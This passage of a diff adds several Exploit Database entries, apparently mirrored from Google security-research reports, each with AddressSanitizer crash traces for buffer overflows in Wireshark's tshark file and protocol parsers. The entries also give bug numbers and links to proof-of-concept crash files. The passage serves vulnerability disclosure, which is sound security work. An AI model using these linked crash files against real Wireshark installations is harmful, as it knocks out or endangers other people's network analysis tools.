 The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
 --- cut ---
 ==25088==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffdbb9f36e at pc 0x7f26c4ae2af4 bp 0x7fffdbb9f190 sp 0x7fffdbb9f188
 READ of size 1 at 0x7fffdbb9f36e thread T0
    #0 0x7f26c4ae2af3 in ascii_strup_inplace wireshark/wsutil/str_util.c:71:16
    #1 0x7f26d8893b1c in iseries_check_file_type wireshark/wiretap/iseries.c:336:9
    #2 0x7f26d8892a63 in iseries_open wireshark/wiretap/iseries.c:231:14
    #3 0x7f26d8864c51 in wtap_open_offline wireshark/wiretap/file_access.c:1042:13
    #4 0x51dd9d in cf_open wireshark/tshark.c:4195:9
    #5 0x5178cb in main wireshark/tshark.c:2188:9
 Address 0x7fffdbb9f36e is located in stack of thread T0 at offset 302 in frame
    #0 0x7f26d88934bf in iseries_check_file_type wireshark/wiretap/iseries.c:306
  This frame has 2 object(s):
    [32, 302) 'buf' <== Memory access at offset 302 overflows this variable
    [368, 377) 'protocol'
 HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
 SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/wsutil/str_util.c:71:16 in ascii_strup_inplace
 Shadow bytes around the buggy address:
  0x10007b76be10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10007b76be20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10007b76be30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10007b76be40: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
  0x10007b76be50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 =>0x10007b76be60: 00 00 00 00 00 00 00 00 00 00 00 00 00[06]f2 f2
  0x10007b76be70: f2 f2 f2 f2 f2 f2 00 01 f3 f3 f3 f3 00 00 00 00
  0x10007b76be80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10007b76be90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10007b76bea0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
  0x10007b76beb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==25088==ABORTING
 --- cut ---
 The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11985. Attached is a file which triggers the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39323.zip
--- a/platforms/multiple/dos/39324.txt
+++ b/platforms/multiple/dos/39324.txt
@ -0,0 +1,113 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=696
 The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
 --- cut ---
 ==24710==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe68161a6c at pc 0x0000004ab766 bp 0x7ffe681503f0 sp 0x7ffe6814fba0
 WRITE of size 120 at 0x7ffe68161a6c thread T0
    #0 0x4ab765 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
    #1 0x7ff89a5f89ec in tvb_memcpy wireshark/epan/tvbuff.c:783:10
    #2 0x7ff89b7ba95c in dissect_nhdr_extopt wireshark/epan/dissectors/packet-lbmc.c:10013:13
    #3 0x7ff89b7a1a54 in lbmc_dissect_lbmc_packet wireshark/epan/dissectors/packet-lbmc.c:11039:41
    #4 0x7ff89b82ece9 in dissect_lbttcp_pdu wireshark/epan/dissectors/packet-lbttcp.c:620:21
    #5 0x7ff89c4a5254 in tcp_dissect_pdus wireshark/epan/dissectors/packet-tcp.c:2762:13
    #6 0x7ff89b82c7dc in dissect_lbttcp_real wireshark/epan/dissectors/packet-lbttcp.c:642:5
    #7 0x7ff89b82ad4e in test_lbttcp_packet wireshark/epan/dissectors/packet-lbttcp.c:698:5
    #8 0x7ff89a4b1c57 in dissector_try_heuristic wireshark/epan/packet.c:2332:7
    #9 0x7ff89c4a6de0 in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4644:13
    #10 0x7ff89c4ac5e3 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4690:13
    #11 0x7ff89c4a765b in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4771:9
    #12 0x7ff89c4bc7f0 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5623:13
    #13 0x7ff89a4b74a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
    #14 0x7ff89a4a9e2a in call_dissector_work wireshark/epan/packet.c:694:9
    #15 0x7ff89a4a95fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
    #16 0x7ff89b5f0e0b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1976:7
    #17 0x7ff89b5fba21 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2468:10
    #18 0x7ff89b5f1569 in dissect_ip wireshark/epan/dissectors/packet-ip.c:2491:5
    #19 0x7ff89a4b74a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
    #20 0x7ff89a4a9e2a in call_dissector_work wireshark/epan/packet.c:694:9
    #21 0x7ff89a4a95fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
    #22 0x7ff89a4aa1a4 in dissector_try_uint wireshark/epan/packet.c:1177:9
    #23 0x7ff89bdd7830 in dissect_ppp_common wireshark/epan/dissectors/packet-ppp.c:4346:10
    #24 0x7ff89bdd6fec in dissect_ppp_hdlc_common wireshark/epan/dissectors/packet-ppp.c:5339:5
    #25 0x7ff89bdcf2a5 in dissect_ppp_hdlc wireshark/epan/dissectors/packet-ppp.c:5380:5
    #26 0x7ff89a4b74a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
    #27 0x7ff89a4a9e2a in call_dissector_work wireshark/epan/packet.c:694:9
    #28 0x7ff89a4a95fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
    #29 0x7ff89b1e60d3 in dissect_frame wireshark/epan/dissectors/packet-frame.c:491:11
    #30 0x7ff89a4b74a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
    #31 0x7ff89a4a9e2a in call_dissector_work wireshark/epan/packet.c:694:9
    #32 0x7ff89a4b396e in call_dissector_only wireshark/epan/packet.c:2665:8
    #33 0x7ff89a4a53df in call_dissector_with_data wireshark/epan/packet.c:2678:8
    #34 0x7ff89a4a4a2b in dissect_record wireshark/epan/packet.c:502:3
    #35 0x7ff89a4559b9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
    #36 0x52856b in process_packet wireshark/tshark.c:3728:5
    #37 0x5219e0 in load_cap_file wireshark/tshark.c:3484:11
    #38 0x517e2c in main wireshark/tshark.c:2197:13
 Address 0x7ffe68161a6c is located in stack of thread T0 at offset 65644 in frame
    #0 0x7ff89b79d1ff in lbmc_dissect_lbmc_packet wireshark/epan/dissectors/packet-lbmc.c:10597
  This frame has 17 object(s):
    [32, 36) 'bhdr'
    [48, 52) 'msgprop_len'
    [64, 80) 'frag_info'
    [96, 65644) 'reassembly' <== Memory access at offset 65644 overflows this variable
    [65904, 65908) 'data_is_umq_cmd_resp'
    [65920, 65940) 'stream_info'
    [65984, 65996) 'ctxinstd_info'
    [66016, 66028) 'ctxinstr_info'
    [66048, 66120) 'destination_info'
    [66160, 66416) 'found_header'
    [66480, 66584) 'uim_stream_info'
    [66624, 66632) 'tcp_sid_info'
    [66656, 66672) 'tcp_addr'
    [66688, 66692) 'tcp_session_id'
    [66704, 66712) 'hdtbl_entry'
    [66736, 66740) 'encoding'
    [66752, 66756) 'pdmlen'
 HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
 SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
 Shadow bytes around the buggy address:
  0x10004d0242f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004d024300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004d024310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004d024320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004d024330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 =>0x10004d024340: 00 00 00 00 00 00 00 00 00 00 00 00 00[04]f2 f2
  0x10004d024350: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
  0x10004d024360: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 04 f2
  0x10004d024370: 00 00 04 f2 f2 f2 f2 f2 00 04 f2 f2 00 04 f2 f2
  0x10004d024380: 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 00 00
  0x10004d024390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==24710==ABORTING
 --- cut ---
 The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11984. Attached are two files which trigger the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39324.zip
--- a/platforms/multiple/dos/39325.txt
+++ b/platforms/multiple/dos/39325.txt
@ -0,0 +1,89 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=695
 The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
 --- cut ---
 ==24377==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f7a3ce4efe0 at pc 0x7f7a39a5a121 bp 0x7ffe1fcb92e0 sp 0x7ffe1fcb92d8
 READ of size 4 at 0x7f7a3ce4efe0 thread T0
    #0 0x7f7a39a5a120 in hiqnet_display_data wireshark/epan/dissectors/packet-hiqnet.c:523:15
    #1 0x7f7a39a59354 in dissect_hiqnet_pdu wireshark/epan/dissectors/packet-hiqnet.c:906:34
    #2 0x7f7a39a560b7 in dissect_hiqnet_udp wireshark/epan/dissectors/packet-hiqnet.c:1031:9
    #3 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
    #4 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9
    #5 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
    #6 0x7f7a38aa41a4 in dissector_try_uint wireshark/epan/packet.c:1177:9
    #7 0x7f7a3abc065d in decode_udp_ports wireshark/epan/dissectors/packet-udp.c:536:7
    #8 0x7f7a3abce912 in dissect wireshark/epan/dissectors/packet-udp.c:1031:5
    #9 0x7f7a3abc31a0 in dissect_udplite wireshark/epan/dissectors/packet-udp.c:1044:3
    #10 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
    #11 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9
    #12 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
    #13 0x7f7a39beae0b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1976:7
    #14 0x7f7a39bf5a21 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2468:10
    #15 0x7f7a39beb569 in dissect_ip wireshark/epan/dissectors/packet-ip.c:2491:5
    #16 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
    #17 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9
    #18 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
    #19 0x7f7a38aa41a4 in dissector_try_uint wireshark/epan/packet.c:1177:9
    #20 0x7f7a3a3d1830 in dissect_ppp_common wireshark/epan/dissectors/packet-ppp.c:4346:10
    #21 0x7f7a3a3d0fec in dissect_ppp_hdlc_common wireshark/epan/dissectors/packet-ppp.c:5339:5
    #22 0x7f7a3a3c92a5 in dissect_ppp_hdlc wireshark/epan/dissectors/packet-ppp.c:5380:5
    #23 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
    #24 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9
    #25 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
    #26 0x7f7a397e00d3 in dissect_frame wireshark/epan/dissectors/packet-frame.c:491:11
    #27 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
    #28 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9
    #29 0x7f7a38aad96e in call_dissector_only wireshark/epan/packet.c:2665:8
    #30 0x7f7a38a9f3df in call_dissector_with_data wireshark/epan/packet.c:2678:8
    #31 0x7f7a38a9ea2b in dissect_record wireshark/epan/packet.c:502:3
    #32 0x7f7a38a4f9b9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
    #33 0x52856b in process_packet wireshark/tshark.c:3728:5
    #34 0x5219e0 in load_cap_file wireshark/tshark.c:3484:11
    #35 0x517e2c in main wireshark/tshark.c:2197:13
 0x7f7a3ce4efe0 is located 32 bytes to the left of global variable '' defined in 'packet-hiqnet.c' (0x7f7a3ce4f000) of size 16
  '' is ascii string 'packet-hiqnet.c'
 0x7f7a3ce4efe0 is located 16 bytes to the right of global variable 'hiqnet_datasize_per_type' defined in 'packet-hiqnet.c:282:19' (0x7f7a3ce4efa0) of size 48
 SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-hiqnet.c:523:15 in hiqnet_display_data
 Shadow bytes around the buggy address:
  0x0fefc79c1da0: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
  0x0fefc79c1db0: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 05 f9 f9
  0x0fefc79c1dc0: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 00 f9 f9
  0x0fefc79c1dd0: f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9
  0x0fefc79c1de0: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 04 f9 f9
 =>0x0fefc79c1df0: f9 f9 f9 f9 00 00 00 00 00 00 f9 f9[f9]f9 f9 f9
  0x0fefc79c1e00: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x0fefc79c1e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fefc79c1e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fefc79c1e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fefc79c1e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 --- cut ---
 The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11983. Attached are three files which trigger the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39325.zip
--- a/platforms/multiple/dos/39326.txt
+++ b/platforms/multiple/dos/39326.txt
@ -0,0 +1,64 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=694
 The following crash due to a stack-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
 --- cut ---
 ==23220==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffc04c9c20 at pc 0x00000046cc29 bp 0x7fffc04c99b0 sp 0x7fffc04c9160
 READ of size 515 at 0x7fffc04c9c20 thread T0
    #0 0x46cc28 in StrstrCheck(void*, char*, char const*, char const*) llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:314
    #1 0x46d0f7 in __interceptor_strstr llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:328
    #2 0x7fbfa4361585 in nettrace_3gpp_32_423_file_open wireshark/wiretap/nettrace_3gpp_32_423.c:986:13
    #3 0x7fbfa429fc7c in wtap_open_offline wireshark/wiretap/file_access.c:913:11
    #4 0x51dd9d in cf_open wireshark/tshark.c:4195:9
    #5 0x5178cb in main wireshark/tshark.c:2188:9
 Address 0x7fffc04c9c20 is located in stack of thread T0 at offset 544 in frame
    #0 0x7fbfa43611ff in nettrace_3gpp_32_423_file_open wireshark/wiretap/nettrace_3gpp_32_423.c:964
  This frame has 1 object(s):
    [32, 544) 'magic_buf' <== Memory access at offset 544 overflows this variable
 HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
 SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:314 in StrstrCheck(void*, char*, char const*, char const*)
 Shadow bytes around the buggy address:
  0x100078091330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100078091340: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00
  0x100078091350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100078091360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100078091370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 =>0x100078091380: 00 00 00 00[f3]f3 f3 f3 f3 f3 f3 f3 00 00 00 00
  0x100078091390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000780913a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000780913b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000780913c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000780913d0: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==23220==ABORTING
 --- cut ---
 The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11982. Attached are three files which trigger the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39326.zip
--- a/platforms/multiple/dos/39327.txt
+++ b/platforms/multiple/dos/39327.txt
@ -0,0 +1,133 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=659
 The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
 --- cut ---
 ==6953==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fdbb5647800 at pc 0x7fdd101b5365 bp 0x7ffee2b92610 sp 0x7ffee2b92608
 READ of size 1 at 0x7fdbb5647800 thread T0
    #0 0x7fdd101b5364 in dissect_ber_constrained_bitstring wireshark/epan/dissectors/packet-ber.c:3990:17
    #1 0x7fdd101b5a56 in dissect_ber_bitstring wireshark/epan/dissectors/packet-ber.c:4016:10
    #2 0x7fdd1277c345 in dissect_ns_cert_exts_CertType wireshark/epan/dissectors/../../asn1/ns_cert_exts/packet-ns_cert_exts-fn.c:93:12
    #3 0x7fdd1277b3fe in dissect_CertType_PDU wireshark/epan/dissectors/../../asn1/ns_cert_exts/packet-ns_cert_exts-fn.c:155:12
    #4 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #5 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
    #6 0x7fdd0fcba02d in dissector_try_string wireshark/epan/packet.c:1443:9
    #7 0x7fdd1019276b in call_ber_oid_callback wireshark/epan/dissectors/packet-ber.c:1096:17
    #8 0x7fdd12bd0192 in dissect_x509af_T_extnValue wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:138:10
    #9 0x7fdd101a1d4a in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
    #10 0x7fdd12bcd47d in dissect_x509af_Extension wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:155:12
    #11 0x7fdd101ae695 in dissect_ber_sq_of wireshark/epan/dissectors/packet-ber.c:3490:9
    #12 0x7fdd101aea3b in dissect_ber_sequence_of wireshark/epan/dissectors/packet-ber.c:3521:12
    #13 0x7fdd12bcd52d in dissect_x509af_Extensions wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:168:12
    #14 0x7fdd101a1d4a in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
    #15 0x7fdd12bd02af in dissect_x509af_T_signedCertificate wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:191:12
    #16 0x7fdd101a1d4a in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
    #17 0x7fdd12bcd5dd in dissect_x509af_Certificate wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:218:12
    #18 0x7fdd11c08b83 in ssl_dissect_hnd_cert wireshark/epan/dissectors/packet-ssl-utils.c:5958:21
    #19 0x7fdd11c21752 in dissect_ssl3_handshake wireshark/epan/dissectors/packet-ssl.c:1930:17
    #20 0x7fdd11c1a71b in dissect_ssl3_record wireshark/epan/dissectors/packet-ssl.c:1619:13
    #21 0x7fdd11c14e12 in dissect_ssl wireshark/epan/dissectors/packet-ssl.c:723:26
    #22 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #23 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
    #24 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
    #25 0x7fdd11c697d0 in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4610:9
    #26 0x7fdd11c6f043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
    #27 0x7fdd11c6bbed in desegment_tcp wireshark/epan/dissectors/packet-tcp.c:2260:9
    #28 0x7fdd11c6a24e in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4735:9
    #29 0x7fdd11c7f7a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
    #30 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #31 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
    #32 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
    #33 0x7fdd10dc588b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
    #34 0x7fdd10dd02b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
    #35 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #36 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
    #37 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
    #38 0x7fdd0fcb8964 in dissector_try_uint wireshark/epan/packet.c:1174:9
    #39 0x7fdd108d748d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
    #40 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #41 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
    #42 0x7fdd0fcc22be in call_dissector_only wireshark/epan/packet.c:2662:8
    #43 0x7fdd0fcb3ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
    #44 0x7fdd108d3725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
    #45 0x7fdd108cbf33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
    #46 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #47 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
    #48 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
    #49 0x7fdd109c75f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
    #50 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #51 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
    #52 0x7fdd0fcc22be in call_dissector_only wireshark/epan/packet.c:2662:8
    #53 0x7fdd0fcb3ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
    #54 0x7fdd0fcb333b in dissect_record wireshark/epan/packet.c:501:3
    #55 0x7fdd0fc613c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
    #56 0x5264eb in process_packet wireshark/tshark.c:3728:5
    #57 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
    #58 0x515daf in main wireshark/tshark.c:2197:13
 0x7fdbb5647800 is located 0 bytes to the right of 2097152-byte region [0x7fdbb5447800,0x7fdbb5647800)
 allocated by thread T0 here:
    #0 0x4c0bc8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
    #1 0x7fdd081e9610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
    #2 0x7fdd131b731d in wmem_block_fast_alloc wireshark/epan/wmem/wmem_allocator_block_fast.c:126:9
    #3 0x7fdd0fc0f4ca in address_to_str wireshark/epan/address_types.c:909:18
    #4 0x7fdd0fc109b0 in address_with_resolution_to_str wireshark/epan/address_types.c:1054:16
    #5 0x7fdd108d16c5 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:494:17
    #6 0x7fdd108cbf33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
    #7 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #8 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
    #9 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
    #10 0x7fdd109c75f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
    #11 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #12 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
    #13 0x7fdd0fcc22be in call_dissector_only wireshark/epan/packet.c:2662:8
    #14 0x7fdd0fcb3ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
    #15 0x7fdd0fcb333b in dissect_record wireshark/epan/packet.c:501:3
    #16 0x7fdd0fc613c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
    #17 0x5264eb in process_packet wireshark/tshark.c:3728:5
    #18 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
    #19 0x515daf in main wireshark/tshark.c:2197:13
 SUMMARY: AddressSanitizer: heap-buffer-overflow wireshark/epan/dissectors/packet-ber.c:3990:17 in dissect_ber_constrained_bitstring
 Shadow bytes around the buggy address:
  0x0ffbf6ac0eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbf6ac0ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbf6ac0ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbf6ac0ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffbf6ac0ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 =>0x0ffbf6ac0f00:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbf6ac0f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0ffbf6ac0f20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
